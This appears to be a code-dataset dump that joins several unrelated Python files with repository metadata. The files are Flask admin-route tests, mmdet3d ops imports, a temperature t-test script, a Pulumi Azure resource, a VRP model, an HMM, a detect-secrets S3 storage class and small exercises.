from ramp_database.tools.user import get_user_by_name
from ramp_database.tools.team import ask_sign_up_team
from ramp_database.tools.team import get_event_team_by_name
from ramp_frontend import create_app
from ramp_frontend.testing import login_scope
@pytest.fixture(scope="module")
def client_session(database_connection):
database_config = read_config(database_config_template())
ramp_config = ramp_config_template()
try:
deployment_dir = create_toy_db(database_config, ramp_config)
flask_config = generate_flask_config(database_config)
app = create_app(flask_config)
app.config["TESTING"] = True
app.config["WTF_CSRF_ENABLED"] = False
with session_scope(database_config["sqlalchemy"]) as session:
yield app.test_client(), session
finally:
shutil.rmtree(deployment_dir, ignore_errors=True)
try:
# In case of failure we should close the global flask engine
from ramp_frontend import db as db_flask
db_flask.session.close()
except RuntimeError:
pass
db, _ = setup_db(database_config["sqlalchemy"])
Model.metadata.drop_all(db)
@pytest.mark.parametrize(
"page",
[
"/approve_users",
"/manage_users",
"/sign_up/test_user",
"/events/iris_test/sign_up/test_user",
"/events/iris_test/update",
"/user_interactions",
"/events/iris_test/dashboard_submissions",
],
)
def test_check_login_required(client_session, page):
client, _ = client_session
rv = client.get(page)
assert rv.status_code == 302
assert "http://localhost/login" in rv.location
rv = client.get(page, follow_redirects=True)
assert rv.status_code == 200
@pytest.mark.parametrize(
"page, request_function",
[
("/approve_users", ["get", "post"]),
("/manage_users", ["get"]),
("/sign_up/test_user", ["get"]),
("/events/iris_test/sign_up/test_user", ["get"]),
("/events/iris_test/update", ["get", "post"]),
("/user_interactions", ["get"]),
("/events/iris_test/dashboard_submissions", ["get"]),
],
)
def test_check_admin_required(client_session, page, request_function):
client, _ = client_session
with login_scope(client, "test_user", "test") as client:
for rf in request_function:
rv = getattr(client, rf)(page)
with client.session_transaction() as cs:
flash_message = dict(cs["_flashes"])
assert (
flash_message["message"] == "Sorry User, you do not have admin rights"
)
assert rv.status_code == 302
assert rv.location == "http://localhost/problems"
rv = getattr(client, rf)(page, follow_redirects=True)
assert rv.status_code == 200
def test_approve_users_remove(client_session):
client, session = client_session
# create 2 new users
add_user(session, "xx", "xx", "xx", "xx", "xx", access_level="user")
add_user(session, "yy", "yy", "yy", "yy", "yy", access_level="asked")
# ask for sign up for an event for the first user
_, _, event_team = ask_sign_up_team(session, "iris_test", "xx")
with login_scope(client, "test_iris_admin", "test") as client:
# GET check that we get all new user to be approved
rv = client.get("/approve_users")
assert rv.status_code == 200
# line for user approval
assert b"yy yy - yy" in rv.data
# line for the event approval
assert b"iris_test - xx"
# POST check that we are able to approve a user and event
data = ImmutableMultiDict(
[
("submit_button", "Remove!"),
("approve_users", "yy"),
("approve_event_teams", str(event_team.id)),
]
)
rv = client.post("/approve_users", data=data)
assert rv.status_code == 302
assert rv.location == "http://localhost/problems"
# ensure that the previous change have been committed within our
# session
session.commit()
user = get_user_by_name(session, "yy")
assert user is None
event_team = get_event_team_by_name(session, "iris_test", "xx")
assert event_team is None
with client.session_transaction() as cs:
flash_message = dict(cs["_flashes"])
assert re.match(
r"Removed users:\nyy\nRemoved event_team:\n"
r"Event\(iris_test\)/Team\(.*xx.*\)\n",
flash_message["Removed users"],
)
def test_approve_users_approve(client_session):
client, session = client_session
# create 2 new users
add_user(session, "cc", "cc", "cc", "cc", "cc", access_level="user")
add_user(session, "dd", "dd", "dd", "dd", "dd", access_level="asked")
# ask for sign up for an event for the first user
_, _, event_team = ask_sign_up_team(session, "iris_test", "cc")
with login_scope(client, "test_iris_admin", "test") as client:
# GET check that we get all new user to be approved
rv = client.get("/approve_users")
assert rv.status_code == 200
# line for user approval
assert b"dd dd - dd" in rv.data
# line for the event approval
assert b"iris_test - cc"
# POST check that we are able to approve a user and event
data = ImmutableMultiDict(
[
("submit_button", "Approve!"),
("approve_users", "dd"),
("approve_event_teams", str(event_team.id)),
]
)
rv = client.post("/approve_users", data=data)
assert rv.status_code == 302
assert rv.location == "http://localhost/problems"
# ensure that the previous change have been committed within our
# session
session.commit()
user = get_user_by_name(session, "dd")
assert user.access_level == "user"
event_team = get_event_team_by_name(session, "iris_test", "cc")
assert event_team.approved
with client.session_transaction() as cs:
flash_message = dict(cs["_flashes"])
assert re.match(
r"Approved users:\ndd\nApproved event_team:\n"
r"Event\(iris_test\)/Team\(.*cc.*\)\n",
flash_message["Approved users"],
)
def test_approve_single_user(client_session):
client, session = client_session
add_user(session, "gg", "gg", "gg", "gg", "gg", access_level="asked")
with login_scope(client, "test_iris_admin", "test") as client:
rv = client.get("/sign_up/gg")
assert rv.status_code == 302
assert rv.location == "http://localhost/problems"
with client.session_transaction() as cs:
flash_message = dict(cs["_flashes"])
assert re.match(
"User(.*gg.*) is signed up", flash_message["Successful sign-up"]
)
# ensure that the previous change have been committed within our
# session
session.commit()
user = get_user_by_name(session, "gg")
assert user.access_level == "user"
rv = client.get("/sign_up/unknown_user")
session.commit()
assert rv.status_code == 302
assert rv.location == "http://localhost/problems"
with client.session_transaction() as cs:
flash_message = dict(cs["_flashes"])
assert flash_message["message"] == "No user unknown_user"
def test_approve_sign_up_for_event(client_session):
client, session = client_session
with login_scope(client, "test_iris_admin", "test") as client:
# check the redirection if the user or the event does not exist
rv = client.get("/events/xxx/sign_up/test_user")
session.commit()
assert rv.status_code == 302
assert rv.location == "http://localhost/problems"
with client.session_transaction() as cs:
flash_message = dict(cs["_flashes"])
assert flash_message["message"] == "No event xxx or no user test_user"
rv = client.get("/events/iris_test/sign_up/xxxx")
session.commit()
assert rv.status_code == 302
assert rv.location == "http://localhost/problems"
with client.session_transaction() as cs:
flash_message = dict(cs["_flashes"])
assert flash_message["message"] == "No event iris_test or no user xxxx"
add_user(session, "zz", "zz", "zz", "zz", "zz", access_level="user")
_, _, event_team = ask_sign_up_team(session, "iris_test", "zz")
assert not event_team.approved
rv = client.get("/events/iris_test/sign_up/zz")
assert rv.status_code == 302
assert rv.location == "http://localhost/problems"
session.commit()
event_team = get_event_team_by_name(session, "iris_test", "zz")
assert event_team.approved
with client.session_transaction() as cs:
flash_message = dict(cs["_flashes"])
assert "is signed up for Event" in flash_message["Successful sign-up"]
def test_manage_users(client_session):
client, session = client_session
# create 2 new users
add_user(session, "ff", "ff", "ff", "ff", "ff", access_level="user")
add_user(session, "ll", "ll", "ll", "ll", "ll", access_level="asked")
# ask for sign up for an event for the first user
_, _, event_team = ask_sign_up_team(session, "iris_test", "xx")
with login_scope(client, "test_iris_admin", "test") as client:
# GET check that we get all users
rv = client.get("/manage_users")
assert rv.status_code == 200
# assert b'yy yy - yy' in rv.data
def test_update_event(client_session):
client, session = client_session
with login_scope(client, "test_iris_admin", "test") as client:
# in case that the event does not exist
rv = client.get("/events/boston_housing/update")
assert rv.status_code == 302
assert rv.location == "http://localhost/problems"
with client.session_transaction() as cs:
flash_message = dict(cs["_flashes"])
assert 'no event named "boston_housing"' in flash_message["message"]
# GET: pre-fill the forms
rv = client.get("/events/iris_test/update")
assert rv.status_code == 200
assert b"Minimum duration between submissions" in rv.data
# POST: update the event data
event_info = {
"suffix": "test",
"title": "Iris new title",
"is_send_trained_mail": True,
"is_public": True,
"is_controled_signup": True,
"is_competitive": False,
"min_duration_between_submissions_hour": 0,
"min_duration_between_submissions_minute": 0,
"min_duration_between_submissions_second": 0,
"opening_timestamp": "2000-01-01 00:00:00",
"closing_timestamp": "2100-01-01 00:00:00",
"public_opening_timestamp": "2000-01-01 00:00:00",
}
rv = client.post("/events/iris_test/update", data=event_info)
assert rv.status_code == 302
assert rv.location == "http://localhost/problems"
event = get_event(session, "iris_test")
assert event.min_duration_between_submissions == 0
def test_user_interactions(client_session):
client, _ = client_session
with login_scope(client, "test_iris_admin", "test") as client:
rv = client.get("/user_interactions")
assert rv.status_code == 200
assert b"landing" in rv.data
# TODO: To be tested when we implemented properly the leaderboard
# def test_dashboard_submissions(client_session):
# client, session = client_session
# with login_scope(client, 'test_iris_admin', 'test') as client:
# rv = client.get('/events/iris_test/dashboard_submissions')
# print(rv.data.decode('utf-8'))
| 37.244776
| 86
| 0.636772
|
cff1dcb38adf56cd273c18181cb3d86cab7ae113
| 2,330
|
py
|
Python
|
mmdet3d/ops/__init__.py
|
chence17/fcaf3d
|
636aaa0410430deedd7bd4979e8c1bc307424a84
|
[
"MIT"
] | 95
|
2021-12-01T07:32:48.000Z
|
2022-03-11T07:12:32.000Z
|
mmdet3d/ops/__init__.py
|
chence17/fcaf3d
|
636aaa0410430deedd7bd4979e8c1bc307424a84
|
[
"MIT"
] | 15
|
2021-12-03T09:56:17.000Z
|
2022-03-07T13:01:12.000Z
|
mmdet3d/ops/__init__.py
|
chence17/fcaf3d
|
636aaa0410430deedd7bd4979e8c1bc307424a84
|
[
"MIT"
] | 21
|
2021-12-02T11:07:55.000Z
|
2022-03-28T15:25:02.000Z
|
from mmcv.ops import (RoIAlign, SigmoidFocalLoss, get_compiler_version,
get_compiling_cuda_version, nms, roi_align,
sigmoid_focal_loss)
from .ball_query import ball_query
from .furthest_point_sample import (Points_Sampler, furthest_point_sample,
furthest_point_sample_with_dist)
from .gather_points import gather_points
from .group_points import (GroupAll, QueryAndGroup, group_points,
grouping_operation)
from .interpolate import three_interpolate, three_nn
from .knn import knn
from .norm import NaiveSyncBatchNorm1d, NaiveSyncBatchNorm2d
from .paconv import PAConv, PAConvCUDA, assign_score_withk
from .pointnet_modules import (PAConvCUDASAModule, PAConvCUDASAModuleMSG,
PAConvSAModule, PAConvSAModuleMSG,
PointFPModule, PointSAModule, PointSAModuleMSG,
build_sa_module)
from .roiaware_pool3d import (RoIAwarePool3d, points_in_boxes_batch,
points_in_boxes_cpu, points_in_boxes_gpu)
from .sparse_block import (SparseBasicBlock, SparseBottleneck,
make_sparse_convmodule)
from .voxel import DynamicScatter, Voxelization, dynamic_scatter, voxelization
from .rotated_iou import cal_iou_3d, cal_giou_3d
__all__ = [
'nms', 'soft_nms', 'RoIAlign', 'roi_align', 'get_compiler_version',
'get_compiling_cuda_version', 'NaiveSyncBatchNorm1d',
'NaiveSyncBatchNorm2d', 'batched_nms', 'Voxelization', 'voxelization',
'dynamic_scatter', 'DynamicScatter', 'sigmoid_focal_loss',
'SigmoidFocalLoss', 'SparseBasicBlock', 'SparseBottleneck',
'RoIAwarePool3d', 'points_in_boxes_gpu', 'points_in_boxes_cpu',
'make_sparse_convmodule', 'ball_query', 'knn', 'furthest_point_sample',
'furthest_point_sample_with_dist', 'three_interpolate', 'three_nn',
'gather_points', 'grouping_operation', 'group_points', 'GroupAll',
'QueryAndGroup', 'PointSAModule', 'PointSAModuleMSG', 'PointFPModule',
'points_in_boxes_batch', 'get_compiler_version', 'assign_score_withk',
'get_compiling_cuda_version', 'Points_Sampler', 'build_sa_module',
'PAConv', 'PAConvCUDA', 'PAConvSAModuleMSG', 'PAConvSAModule',
'PAConvCUDASAModule', 'PAConvCUDASAModuleMSG'
]
| 55.47619
| 78
| 0.719742
|
f99d30348e5cb78a7bec0884dce2dc7bf7cefd05
| 58
|
py
|
Python
|
scilog/__init__.py
|
soerenwolfers/scilog
|
ca66a6a7b8d267c8f2998b2a935b35b8f95b7558
|
[
"MIT"
] | null | null | null |
scilog/__init__.py
|
soerenwolfers/scilog
|
ca66a6a7b8d267c8f2998b2a935b35b8f95b7558
|
[
"MIT"
] | null | null | null |
scilog/__init__.py
|
soerenwolfers/scilog
|
ca66a6a7b8d267c8f2998b2a935b35b8f95b7558
|
[
"MIT"
] | null | null | null |
from .scilog import record,load,analyze,ConvergencePlotter
| 58
| 58
| 0.87931
|
69980dc4f75401a67140b78148972f2063a9378d
| 2,367
|
py
|
Python
|
HypothesisTesting/TurnOnAC.py
|
teerasitk/DataAnalyticsIOTBootCamp
|
7b0c6d008fc83136878c56b2bff496e61d5656cb
|
[
"MIT"
] | null | null | null |
HypothesisTesting/TurnOnAC.py
|
teerasitk/DataAnalyticsIOTBootCamp
|
7b0c6d008fc83136878c56b2bff496e61d5656cb
|
[
"MIT"
] | null | null | null |
HypothesisTesting/TurnOnAC.py
|
teerasitk/DataAnalyticsIOTBootCamp
|
7b0c6d008fc83136878c56b2bff496e61d5656cb
|
[
"MIT"
] | null | null | null |
import pandas as pd
from scipy.stats import ttest_1samp, t, sem
import matplotlib.pyplot as plt # for plot graph
df_temp = pd.read_csv("../Data/NodeTemperature.csv") # Load the csv file
df_temp.AbsT = pd.to_datetime(df_temp.AbsT)
# convert data-time text into actual datetime list
df_temp = df_temp.set_index("AbsT") # set "AbsT" column as index column
t_scores = [] #empty list
p_values = [] #empty list
significance_level = 0.05 # Type I Error
target_temp = 20.8
for row in range(df_temp.shape[0]):
data = df_temp.iloc[row]
t_score, p_val = ttest_1samp(data, popmean=target_temp)
t_scores.append(t_score)
if t_score < 0:
# Expecting positive t-score if
# temperature is above target_temp
# t-score < 0 indicates that temp is lower
# than the target_temp.
# Thus, change p to 1-p when t-score <0
p_values.append(1 - p_val/2.0)
else:
p_values.append(p_val/2.0) # Divided by 2 since it is 2-tail test
t_crit = t.ppf(1 - significance_level,3) #df = n-1=4-1 sensors
# convert t_scores and p_values into pandas data frame
test_stats = pd.DataFrame({"t_score":t_scores,
"p_value":p_values,
"t_critical":t_crit},
index=df_temp.index)
test_stats.to_csv("TTestFor20_8.csv") # save to file
# plot the t-score and p-value
plt.figure(figsize=(15,8))
plt.subplot(2,1,1)
plt.plot(test_stats.t_score, label="t-score")
plt.plot(test_stats.t_critical, label="5%-Significance Critical Value")
plt.grid()
plt.legend()
plt.subplot(2,1,2)
plt.plot(test_stats.p_value, label="p-value")
plt.grid()
plt.ylim(0,0.2)
plt.yticks([0,0.05,0.1,0.15,0.2])
plt.legend()
plt.show()
#plot the on and off time with node temperatures
alpha = significance_level
ac_on = (test_stats.p_value < alpha)
plt.figure(figsize=(15,8))
plt.plot(ac_on*1+20.2, label="Ac ON")
plt.plot(df_temp.node1, label="node1")
plt.plot(df_temp.node2, label="node2")
plt.plot(df_temp.node3, label="node3")
plt.plot(df_temp.node4, label="node4")
plt.grid()
plt.xlabel("Time")
plt.title("AC On vs Temperatures")
plt.show()
def makeText(is_on):
if is_on:
return "On"
else:
return "Off"
ac_status = pd.DataFrame({"status": ac_on},
index=df_temp.index)
ac_status.status = ac_status.status.map(makeText)
print(ac_status.head())
ac_status.to_csv("ACStatus.csv")
| 31.56
| 72
| 0.689058
|
1b42e848a314b5e75e704039668bdc7f10ace8c8
| 5,544
|
py
|
Python
|
sdk/python/pulumi_azure_nextgen/resources/v20190701/deployment_at_subscription_scope.py
|
test-wiz-sec/pulumi-azure-nextgen
|
20a695af0d020b34b0f1c336e1b69702755174cc
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_nextgen/resources/v20190701/deployment_at_subscription_scope.py
|
test-wiz-sec/pulumi-azure-nextgen
|
20a695af0d020b34b0f1c336e1b69702755174cc
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_nextgen/resources/v20190701/deployment_at_subscription_scope.py
|
test-wiz-sec/pulumi-azure-nextgen
|
20a695af0d020b34b0f1c336e1b69702755174cc
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from ... import _utilities, _tables
from . import outputs
from ._inputs import *
__all__ = ['DeploymentAtSubscriptionScope']
class DeploymentAtSubscriptionScope(pulumi.CustomResource):
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
deployment_name: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
properties: Optional[pulumi.Input[pulumi.InputType['DeploymentPropertiesArgs']]] = None,
__props__=None,
__name__=None,
__opts__=None):
"""
Deployment information.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] deployment_name: The name of the deployment.
:param pulumi.Input[str] location: The location to store the deployment data.
:param pulumi.Input[pulumi.InputType['DeploymentPropertiesArgs']] properties: The deployment properties.
"""
if __name__ is not None:
warnings.warn("explicit use of __name__ is deprecated", DeprecationWarning)
resource_name = __name__
if __opts__ is not None:
warnings.warn("explicit use of __opts__ is deprecated, use 'opts' instead", DeprecationWarning)
opts = __opts__
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = dict()
if deployment_name is None:
raise TypeError("Missing required property 'deployment_name'")
__props__['deployment_name'] = deployment_name
__props__['location'] = location
if properties is None:
raise TypeError("Missing required property 'properties'")
__props__['properties'] = properties
__props__['name'] = None
__props__['type'] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:resources/latest:DeploymentAtSubscriptionScope"), pulumi.Alias(type_="azure-nextgen:resources/v20180501:DeploymentAtSubscriptionScope"), pulumi.Alias(type_="azure-nextgen:resources/v20190301:DeploymentAtSubscriptionScope"), pulumi.Alias(type_="azure-nextgen:resources/v20190501:DeploymentAtSubscriptionScope"), pulumi.Alias(type_="azure-nextgen:resources/v20190510:DeploymentAtSubscriptionScope"), pulumi.Alias(type_="azure-nextgen:resources/v20190801:DeploymentAtSubscriptionScope"), pulumi.Alias(type_="azure-nextgen:resources/v20191001:DeploymentAtSubscriptionScope"), pulumi.Alias(type_="azure-nextgen:resources/v20200601:DeploymentAtSubscriptionScope")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(DeploymentAtSubscriptionScope, __self__).__init__(
'azure-nextgen:resources/v20190701:DeploymentAtSubscriptionScope',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'DeploymentAtSubscriptionScope':
"""
Get an existing DeploymentAtSubscriptionScope resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = dict()
return DeploymentAtSubscriptionScope(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def location(self) -> pulumi.Output[Optional[str]]:
"""
the location of the deployment.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the deployment.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def properties(self) -> pulumi.Output['outputs.DeploymentPropertiesExtendedResponse']:
"""
Deployment properties.
"""
return pulumi.get(self, "properties")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
The type of the deployment.
"""
return pulumi.get(self, "type")
def translate_output_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
def translate_input_property(self, prop):
return _tables.SNAKE_TO_CAMEL_CASE_TABLE.get(prop) or prop
| 44.352
| 746
| 0.670996
|
4f93a93d3ed5d8846880799f10183542f8fb095e
| 1,139
|
py
|
Python
|
problems/g4_world/Vrp.py
|
cprudhom/pycsp3
|
980927188f4262c9ea48a6534795712f09d731d6
|
[
"MIT"
] | null | null | null |
problems/g4_world/Vrp.py
|
cprudhom/pycsp3
|
980927188f4262c9ea48a6534795712f09d731d6
|
[
"MIT"
] | null | null | null |
problems/g4_world/Vrp.py
|
cprudhom/pycsp3
|
980927188f4262c9ea48a6534795712f09d731d6
|
[
"MIT"
] | null | null | null |
"""
See https://en.wikipedia.org/wiki/Vehicle_routing_problem
This model is similar to the one proposed by Jakob Puchinger for the 2009 MiniZinc competition
Example of Execution:
python3 vrp.py -data=Vrp_P-n16-k8.json
"""
from pycsp3 import *
n, capacity, demand, distances = data
# x[i][j] is 1 iff the arc (i,j) is part of a route
x = VarArray(size=[n, n], dom=lambda i, j: {0} if i == j else {0, 1})
# u[i] is the vehicle load after visiting the ith node (used for subtour elimination)
u = VarArray(size=n, dom=lambda i: {0} if i == 0 else range(capacity + 1))
satisfy(
# exactly one incoming arc for each node j other than the depot (node 0)
[Count(x[:, j], value=1) == 1 for j in range(1, n)],
# exactly one outgoing arc for each node i other than the depot (node 0)
[Count(x[i], value=1) == 1 for i in range(1, n)],
# Miller-Tucker-Zemlin subtour elimination
[[u[i], u[j], x[i][j]] * [1, -1, capacity] <= capacity - demand[j] for i in range(1, n) for j in range(1, n) if i != j],
# satisfying demand at each node
[u[i] >= demand[i] for i in range(1, n)]
)
minimize(
x * distances
)
| 31.638889
| 124
| 0.646181
|
dda55d9db2391b520b10c77cc12da9ac70edbb71
| 634
|
py
|
Python
|
src/manage.py
|
yurdosii/GroupLinks.api
|
d07e98dda4afe77912df61bdd639f4640ebecce0
|
[
"MIT"
] | null | null | null |
src/manage.py
|
yurdosii/GroupLinks.api
|
d07e98dda4afe77912df61bdd639f4640ebecce0
|
[
"MIT"
] | null | null | null |
src/manage.py
|
yurdosii/GroupLinks.api
|
d07e98dda4afe77912df61bdd639f4640ebecce0
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'grouplinks_api.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
| 28.818182
| 78
| 0.68612
|
4306ddd4702969f8ff46459210adfdb6a5aea8b9
| 2,699
|
py
|
Python
|
pypos/hmm.py
|
palle-k/pypos
|
94276cc483aa84031e4f7797494c489ee875b8db
|
[
"MIT"
] | null | null | null |
pypos/hmm.py
|
palle-k/pypos
|
94276cc483aa84031e4f7797494c489ee875b8db
|
[
"MIT"
] | null | null | null |
pypos/hmm.py
|
palle-k/pypos
|
94276cc483aa84031e4f7797494c489ee875b8db
|
[
"MIT"
] | null | null | null |
import numpy as np
from typing import Optional
class HMM:
def __init__(self, n_states: int, n_emissions: int):
self.n_states = n_states
self.n_emissions = n_emissions
self.transition_prob_: Optional[np.ndarray] = None
self.start_prob_: Optional[np.ndarray] = None
self.emission_prob_: Optional[np.ndarray] = None
def fit(self, x: np.ndarray, y: np.ndarray, l: np.ndarray):
"""
Fits the HMM to the emission sequences with given target sequences
:param x: Emission sequences (seqlen)
:param y: Target sequences (seqlen)
:param l: Lengths of sequences in X and y
:return: Fitted HMM
"""
self.start_prob_ = np.zeros((self.n_states,))
self.emission_prob_ = np.zeros((self.n_states, self.n_emissions))
self.transition_prob_ = np.zeros((self.n_states, self.n_states))
ptrs = [0, *np.cumsum(l)]
for s in y[ptrs[:-1]]:
self.start_prob_[s] += 1
for ss, se in zip(ptrs[:-1], ptrs[1:]):
obs = x[ss:se] # observation sequence
hss = y[ss:se] # hidden state sequence
for ob, hs in zip(obs, hss):
self.emission_prob_[hs, ob] += 1
for hs1, hs2 in zip(hss[:-1], hss[1:]):
self.transition_prob_[hs1, hs2] += 1
self.start_prob_ /= np.sum(self.start_prob_)
self.emission_prob_ = self.emission_prob_ / np.sum(self.emission_prob_, axis=1)[:, None]
self.transition_prob_ = self.transition_prob_ / np.sum(self.transition_prob_, axis=1)[:, None]
return self
def predict(self, x: np.ndarray):
paths = np.zeros((x.shape[0], self.n_states), dtype='int')
probs = np.zeros((x.shape[0], self.n_states))
probs[0] = self.start_prob_ * self.emission_prob_[:, x[0]]
for i, ob in enumerate(x[1:]):
p_em = self.emission_prob_[:, ob]
in_p = probs[i] * self.transition_prob_.T
max_in = np.argmax(in_p, axis=1)
out_p = in_p[np.arange(0, self.n_states), max_in]
out_p *= p_em
probs[i+1] = out_p
paths[i+1] = max_in
max_out = np.argmax(probs[-1])
path = [max_out]
for i in reversed(range(1, x.shape[0])):
path.append(paths[i, path[-1]])
return np.array(list(reversed(path)))
def score(self, x: np.ndarray):
probs = np.zeros((x.shape[0], self.n_states))
probs[0] = self.start_prob_ * self.emission_prob_[:, x[0]]
for i, ob in enumerate(x[1:]):
probs[i+1] = (probs[i] @ self.transition_prob_) * self.emission_prob_[:, ob]
return probs
| 35.513158
| 103
| 0.580956
|
dc5ab2c5063ac43238ee24f645a151d1d4ab70e8
| 407
|
py
|
Python
|
src/FFEAT/ffeat/flow/__init__.py
|
PatrikValkovic/MasterThesis
|
6e9f3b186541db6c8395ebc96ace7289d01c805b
|
[
"MIT"
] | null | null | null |
src/FFEAT/ffeat/flow/__init__.py
|
PatrikValkovic/MasterThesis
|
6e9f3b186541db6c8395ebc96ace7289d01c805b
|
[
"MIT"
] | null | null | null |
src/FFEAT/ffeat/flow/__init__.py
|
PatrikValkovic/MasterThesis
|
6e9f3b186541db6c8395ebc96ace7289d01c805b
|
[
"MIT"
] | null | null | null |
###############################
#
# Created by Patrik Valkovic
# 3/9/2021
#
###############################
"""
Module implementing classes controlling flow of the algorithm.
"""
from .Lambda import Lambda
from .Select import Select
from .Sequence import Sequence
from .Parallel import Parallel
from .EachArg import EachArg
from .Concat import Concat
from .Repeat import Repeat
from .Replace import Replace
| 22.611111
| 62
| 0.665848
|
1803293cb7139aa137bae64a8995605eb6803c18
| 4,051
|
py
|
Python
|
detect_secrets_server/storage/s3.py
|
ekmixon/detect-secrets-server
|
f2a708fa1a4628a7a93039cae92ef90e8b94d9db
|
[
"Apache-2.0"
] | 110
|
2018-04-13T02:41:40.000Z
|
2021-11-08T10:29:57.000Z
|
detect_secrets_server/storage/s3.py
|
sthagen/detect-secrets-server
|
4e71fa7f551cd1c55803a3fa62145285676fcb50
|
[
"Apache-2.0"
] | 50
|
2018-08-21T10:36:06.000Z
|
2021-04-13T00:42:05.000Z
|
detect_secrets_server/storage/s3.py
|
sthagen/detect-secrets-server
|
4e71fa7f551cd1c55803a3fa62145285676fcb50
|
[
"Apache-2.0"
] | 40
|
2018-07-06T22:03:38.000Z
|
2021-09-09T16:21:32.000Z
|
import os
from .file import FileStorage
from .file import FileStorageWithLocalGit
from detect_secrets_server.core.usage.s3 import should_enable_s3_options
class S3Storage(FileStorage):
"""For file state management, backed to Amazon S3.
See detect_secrets_server.storage.file.FileStorage for the expected
file layout in the S3 bucket.
"""
def __init__(
self,
base_directory,
s3_config
):
super(S3Storage, self).__init__(base_directory)
self.access_key = s3_config['access_key']
self.secret_access_key = s3_config['secret_access_key']
self.bucket_name = s3_config['bucket']
self.prefix = s3_config['prefix']
self._initialize_client()
def get(self, key, force_download=True):
"""Downloads file from S3 into local storage."""
file_on_disk = self.get_tracked_file_location(key)
if force_download or not os.path.exists(file_on_disk):
self.client.download_file(
Bucket=self.bucket_name,
Key=self.get_s3_tracked_file_location(key),
Filename=file_on_disk,
)
return super(S3Storage, self).get(key)
# NOTE: There's no `put` functionality, because S3TrackedRepo handles uploads
# separately. That is, there are cases when you want to store a local
# copy, but not upload it.
def get_tracked_repositories(self):
# Source: https://adamj.eu/tech/2018/01/09/using-boto3-think-pagination/
pages = self.client.get_paginator('list_objects').paginate(
Bucket=self.bucket_name,
Prefix=self.prefix,
)
for page in pages:
for obj in page['Contents']:
filename = os.path.splitext(obj['Key'][len(self.prefix):])[0]
if filename.startswith('/'):
filename = filename[1:]
yield (
self.get(filename, force_download=False),
# TODO: In it's current state, you can't distinguish the
# difference between S3StorageWithLocalGit and S3Storage,
# because there's no separate paths in S3.
#
# Therefore, return None so that the results will be
# displayed irregardless of the user's `--local` flag.
None,
)
def upload(self, key, value):
"""This is different than `put`, to support situations where you
may want to upload locally, but not to be sync'ed with the cloud.
"""
self.client.upload_file(
Filename=self.get_tracked_file_location(key),
Bucket=self.bucket_name,
Key=self.get_s3_tracked_file_location(key),
)
def is_file_uploaded(self, key):
"""Note: that we are using the filename as a prefix, so we will
never run into the 1000 object limit of `list_objects_v2`.
:rtype: bool
"""
filename = self.get_s3_tracked_file_location(key)
response = self.client.list_objects_v2(
Bucket=self.bucket_name,
Prefix=filename,
)
for obj in response.get('Contents', []):
if obj['Key'] == filename:
return bool(obj['Size'])
return False
def _initialize_client(self):
boto3 = self._get_boto3()
if not boto3:
return
self.client = boto3.client(
's3',
aws_access_key_id=self.access_key,
aws_secret_access_key=self.secret_access_key,
)
def _get_boto3(self):
"""Used for mocking purposes."""
if not should_enable_s3_options():
return
import boto3
return boto3
def get_s3_tracked_file_location(self, key):
return os.path.join(
self.prefix,
key + '.json'
)
class S3StorageWithLocalGit(S3Storage, FileStorageWithLocalGit):
pass
| 32.408
| 83
| 0.593434
|
40967919b46da17147530b5852309a783bd2814d
| 387
|
py
|
Python
|
2. Programming Fundamentals With Python (May 2021)/01.Basic Syntax, Conditional Statements and Loops/02_number_definer.py
|
kzborisov/SoftUni
|
ccb2b8850adc79bfb2652a45124c3ff11183412e
|
[
"MIT"
] | 1
|
2021-02-07T07:51:12.000Z
|
2021-02-07T07:51:12.000Z
|
2. Programming Fundamentals With Python (May 2021)/01.Basic Syntax, Conditional Statements and Loops/02_number_definer.py
|
kzborisov/softuni
|
9c5b45c74fa7d9748e9b3ea65a5ae4e15c142751
|
[
"MIT"
] | null | null | null |
2. Programming Fundamentals With Python (May 2021)/01.Basic Syntax, Conditional Statements and Loops/02_number_definer.py
|
kzborisov/softuni
|
9c5b45c74fa7d9748e9b3ea65a5ae4e15c142751
|
[
"MIT"
] | null | null | null |
# Task 02. Number Definer
num = float(input())
if num == 0:
result = 'zero'
elif num > 0:
result = 'positive'
if num < 1:
result = 'small ' + result
elif num > 1000000:
result = 'large ' + result
else:
result = 'negative'
if num > -1:
result = 'small ' + result
